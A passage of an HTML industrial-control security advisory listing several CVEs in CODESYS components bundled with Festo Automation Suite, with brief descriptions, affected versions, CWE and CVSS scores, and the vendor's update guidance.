<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/345.html">CWE-345 Insufficient Verification of Data Authenticity</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-29241</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Gateway 3 before 3.5.16.70 has a NULL pointer dereference that may result in a denial of service (DoS).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-29241">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-29242</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Control Runtime system before 3.5.17.0 has improper input validation. Attackers can send crafted communication packets to change the router's addressing scheme and may re-route, add, remove or change low level communication packages.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-29242">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-30186</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V2 runtime system SP before 2.4.7.55 has a Heap-based Buffer Overflow.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-30186">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-30187</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V2 runtime system SP before 2.4.7.55 has Improper Neutralization of Special Elements used in an OS Command.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-30187">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-30188</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V2 runtime system SP before 2.4.7.55 has a Stack-based Buffer Overflow.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-30188">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-30190</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V2 Web-Server before 1.1.9.20 has Improper Access Control.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-30190">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/306.html">CWE-306 Missing Authentication for Critical Function</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-30195</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS V2 runtime system before 2.4.7.55 has Improper Input Validation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-30195">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-33485</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Control Runtime system before 3.5.17.10 has a Heap-based Buffer Overflow.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-33485">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
